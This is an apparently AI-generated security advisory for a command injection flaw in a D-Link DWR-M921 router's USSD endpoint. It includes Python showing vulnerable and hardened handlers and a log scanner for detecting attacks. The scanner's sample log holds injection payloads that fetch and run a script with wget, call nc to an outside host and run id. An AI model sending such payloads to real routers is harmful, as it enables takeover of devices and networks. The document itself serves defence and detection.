CVE-2026-2085 Overview
CVE-2026-2085 is a command injection vulnerability in the D-Link DWR-M921 router running firmware version 1.1.50. The flaw resides in the function sub_419F20, reached through the /boafrm/formUSSDSetup endpoint, which handles USSD (Unstructured Supplementary Service Data) configuration. An attacker can manipulate the ussdValue parameter to inject arbitrary operating system commands. The attack is exploitable over the network, and an exploit has been disclosed publicly. The vulnerability maps to [CWE-77] (Improper Neutralization of Special Elements used in a Command ('Command Injection')) and [CWE-74] (Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')).
Critical Impact
Authenticated remote attackers can execute arbitrary commands on the underlying router operating system, gaining full control over the device and the network segments it serves.
Affected Products
- D-Link DWR-M921 router (hardware)
- D-Link DWR-M921 firmware version 1.1.50
- USSD Configuration Endpoint (/boafrm/formUSSDSetup)
Discovery Timeline
- 2026-02-07 - CVE-2026-2085 published to NVD
- 2026-02-12 - Last updated in NVD database
Technical Details for CVE-2026-2085
Vulnerability Analysis
The DWR-M921 is a 4G LTE router that exposes a web-based administrative interface backed by the boa HTTP server. The USSD configuration handler /boafrm/formUSSDSetup invokes the internal function sub_419F20 to process user-supplied USSD codes. The handler places the ussdValue argument into a shell command line without neutralizing shell metacharacters. An attacker with an authenticated session can inject command separators such as ;, |, or backticks into ussdValue to execute arbitrary commands with the privileges of the web server process; on consumer routers of this class the HTTP daemon commonly runs as root, so this amounts to full device control.
Successful exploitation results in full device compromise. Attackers can pivot into the internal network, intercept or modify traffic, harvest credentials, install persistent firmware implants, and enroll the device into botnets.
Root Cause
The root cause is missing input sanitization on the ussdValue HTTP parameter before it is concatenated into a shell command string. The firmware does not enforce an allow-list of permitted USSD characters (typically digits, *, and #) and does not invoke the command through a safe execution API that separates arguments from the command interpreter.
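The two defects named above (no allow-list, and a shell command built from the raw parameter) are easiest to see side by side. The following is an added example written for this page, not D-Link's code: the real firmware is native code and its USSD helper binary is not public, so the hypothetical USSD_TOOL is stood in by `echo` purely so the effect of shell parsing is visible. The payload is constructed for the demonstration.

```python
"""Model of a /boafrm/formUSSDSetup-style handler: vulnerable pattern next to a hardened one.

Added example, not the DWR-M921 firmware. USSD_TOOL = "echo" is a stand-in for
the (unknown, hypothetical) USSD helper the firmware calls.
"""
import re
import subprocess

USSD_TOOL = "echo"  # hypothetical stand-in for the firmware's USSD helper binary

# Allow-list for USSD/MMI codes: digits, '*' and '#', bounded length.
USSD_OK = re.compile(r"^[0-9*#]{1,32}$")


def is_valid_ussd(value):
    """Return True only for strings made of digits, '*' and '#'."""
    return USSD_OK.fullmatch(value) is not None


def send_ussd_unsafe(value):
    """Vulnerable pattern: ussdValue is pasted into a shell command line.

    Wrapping the value in double quotes does not help: a '"' inside the value
    closes the quote and ';' starts a second command, exactly as in the CVE.
    """
    cmd = f'{USSD_TOOL} "{value}"'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def send_ussd_argv(value):
    """Defence in depth: no shell at all. The value is a single argv element and
    is never parsed for metacharacters, whatever it contains."""
    return subprocess.run([USSD_TOOL, value], capture_output=True, text=True).stdout


def handle_ussd_setup(form):
    """Hardened handler: allow-list first, then exec without a shell.

    Returns an (http_status, body) pair the way a form handler would.
    """
    value = form.get("ussdValue", "")
    if not is_valid_ussd(value):
        return 400, "invalid ussdValue"
    return 200, send_ussd_argv(value)


# Constructed injection payload: breaks out of the quotes and appends commands.
PAYLOAD = '*100#"; echo INJECTED; echo "'

if __name__ == "__main__":
    print("unsafe:", repr(send_ussd_unsafe(PAYLOAD)))   # INJECTED runs as its own command
    print("argv  :", repr(send_ussd_argv(PAYLOAD)))     # payload echoed back as one literal
    print("hardened:", handle_ussd_setup({"ussdValue": PAYLOAD}))
    print("hardened:", handle_ussd_setup({"ussdValue": "*100#"}))
```

Running it shows `echo INJECTED` executing as a separate command in the unsafe path, the entire payload arriving as one literal argument in the argv path, and the hardened handler rejecting the payload with a 400 before anything is executed. Either fix alone stops this particular payload; the allow-list additionally keeps junk from reaching the helper, and the argv exec protects against whatever the allow-list misses.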
Attack Vector
The attack vector is network-based and targets the router's HTTP management interface. Required privileges are high, meaning the attacker must hold valid administrative credentials to reach the USSD configuration form. Once authenticated, the attacker sends a crafted POST request to /boafrm/formUSSDSetup with a malicious ussdValue payload containing embedded shell commands. No user interaction is required beyond the attacker's own request submission.
The vulnerability manifests when the firmware concatenates the unsanitized ussdValue into a shell invocation handled by sub_419F20. Public disclosure details are tracked in the GitHub Issue Discussion and the VulDB entry #344652.
Detection Methods for CVE-2026-2085
Indicators of Compromise
- HTTP POST requests to /boafrm/formUSSDSetup whose ussdValue parameter contains shell metacharacters (;, |, &, backticks, $(), newlines) after URL-decoding; attackers will typically send them percent-encoded (%3B, %7C, %60, %24%28, %0A), so match on the decoded value, not the raw body.
- Unexpected outbound connections originating from the router's management plane to attacker-controlled infrastructure.
- New or modified processes spawned by the boa web server, particularly shells (sh, busybox) or download utilities (wget, curl, tftp).
- Modified /etc configuration files, cron entries, or rc scripts on the device.
Detection Strategies
- Inspect router HTTP access logs and any upstream WAF or reverse proxy logs for POSTs to /boafrm/formUSSDSetup with non-USSD characters in ussdValue. Note that a standard HTTP access log records only the request line, not the POST body, so body inspection requires a proxy, WAF, or packet capture configured to log it.
- Deploy network IDS signatures that flag shell metacharacters in form parameters destined for the router management interface.
- Baseline normal administrative traffic patterns and alert on USSD configuration changes outside of approved change windows.
- Correlate authentication events on the router with subsequent USSD endpoint requests to detect credential abuse.
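A small scanner that applies the indicators and the log-inspection strategy above to logged request bodies. This is an added example for this page, not a detection shipped by any vendor or tool. It assumes a reverse proxy or WAF in front of the router that logs the POST body (boa's own access log does not), and the log line format and all log lines below are constructed for the demonstration; the 203.0.113.0/24 and 10.10.10.0/24 addresses are documentation ranges.

```python
"""Scan proxy logs for command-injection attempts against /boafrm/formUSSDSetup.

Added example, not from the advisory. Assumed (constructed) line format:
    <ts> <client> <method> <path> <status> "<url-encoded body>"
"""
import re
from urllib.parse import parse_qs

TARGET_PATH = "/boafrm/formUSSDSetup"
PARAM = "ussdValue"

# Legitimate USSD/MMI codes: digits, '*', '#', modest length.
USSD_OK = re.compile(r"^[0-9*#]{1,32}$")

# Shell metacharacters worth naming in an alert; matched after URL-decoding.
METACHARS = {
    ";": "semicolon", "|": "pipe", "&": "ampersand", "`": "backtick",
    "$(": "dollar-paren", "\n": "newline", ">": "redirect", "<": "redirect",
}

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "(.*)"$')

# Constructed sample: one benign USSD change from the admin subnet, one login,
# and four injection attempts from an external address.
SAMPLE_LOG = """\
2026-02-10T09:12:01Z 10.10.10.5 POST /boafrm/formUSSDSetup 200 "ussdValue=*100%23&apply=Apply"
2026-02-10T09:13:44Z 203.0.113.7 POST /boafrm/formUSSDSetup 200 "ussdValue=*100%23%3Bwget+http%3A%2F%2F203.0.113.9%2Fx+-O+%2Ftmp%2Fx%3Bsh+%2Ftmp%2Fx&apply=Apply"
2026-02-10T09:14:02Z 203.0.113.7 POST /boafrm/formUSSDSetup 200 "ussdValue=%60id%60&apply=Apply"
2026-02-10T09:15:30Z 10.10.10.5 POST /boafrm/formLogin 200 "username=admin&password=REDACTED"
2026-02-10T09:16:11Z 203.0.113.7 POST /boafrm/formUSSDSetup 200 "ussdValue=%24(nc+203.0.113.9+4444)&apply=Apply"
2026-02-10T09:17:48Z 203.0.113.7 POST /boafrm/formUSSDSetup 200 "ussdValue=*100%23%0Aid&apply=Apply"
"""


def parse_line(line):
    """Split one log line into fields; None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, path, status, body = m.groups()
    return {"ts": ts, "client": client, "method": method,
            "path": path, "status": int(status), "body": body}


def ussd_findings(value):
    """Reasons a decoded ussdValue looks like an injection attempt; [] if clean."""
    reasons = {name for ch, name in METACHARS.items() if ch in value}
    if not USSD_OK.fullmatch(value):
        reasons.add("outside-allow-list")
    return sorted(reasons)


def scan(log_text):
    """Return one alert per suspicious ussdValue submitted to the USSD endpoint."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != TARGET_PATH:
            continue
        # parse_qs decodes %XX and '+', which mirrors what the firmware's form parser sees.
        for value in parse_qs(rec["body"], keep_blank_values=True).get(PARAM, []):
            reasons = ussd_findings(value)
            if reasons:
                alerts.append({"ts": rec["ts"], "client": rec["client"],
                               "value": value, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f'{a["ts"]} {a["client"]} {a["reasons"]} {a["value"]!r}')
```

The allow-list check is the one that matters: it flags anything that is not a USSD code, so it catches encodings and separators the metacharacter table does not list. The named metacharacters only make the alert more readable. Adapt LINE_RE to whatever your proxy or WAF actually emits; the rest is format-independent.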
Monitoring Recommendations
- Forward router syslog and HTTP server logs to a centralized log platform for retention and analysis.
- Monitor DNS and NetFlow data for the router's management IP to identify unexpected egress destinations.
- Track firmware integrity by periodically comparing running firmware hashes against known-good baselines.
How to Mitigate CVE-2026-2085
Immediate Actions Required
- Restrict access to the router's web management interface to trusted management VLANs or jump hosts; never expose it to the public internet.
- Rotate administrative credentials and enforce strong, unique passwords for all router accounts.
- Disable the USSD configuration feature if it is not required for operational use.
- Audit the router for unauthorized configuration changes, new accounts, and unexpected processes or scripts.
Patch Information
No vendor patch has been referenced in the published advisory at the time of NVD publication. Administrators should monitor the D-Link support portal for firmware updates addressing the DWR-M921 1.1.50 USSD command injection issue. Apply firmware updates as soon as they are released by the vendor.
Workarounds
- Place the router's management interface behind a firewall ACL that only permits inbound connections from authorized administrative IP ranges.
- Require VPN access for any remote administration of the device.
- Disable remote management (WAN-side administration) entirely if not required.
- Segment IoT and SOHO routers onto isolated management networks to limit blast radius if a device is compromised.
# Example iptables ACL: allow HTTP/HTTPS to the management interface only from
# the trusted admin subnet and drop everything else. Rules are evaluated in
# order, so these must sit ahead of any broader ACCEPT (insert with -I, or flush
# first). INPUT applies on the host that terminates the management interface;
# on a separate firewall in front of the router use FORWARD with -d <router-ip>.
iptables -A INPUT -p tcp --dport 80 -s 10.10.10.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -s 10.10.10.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.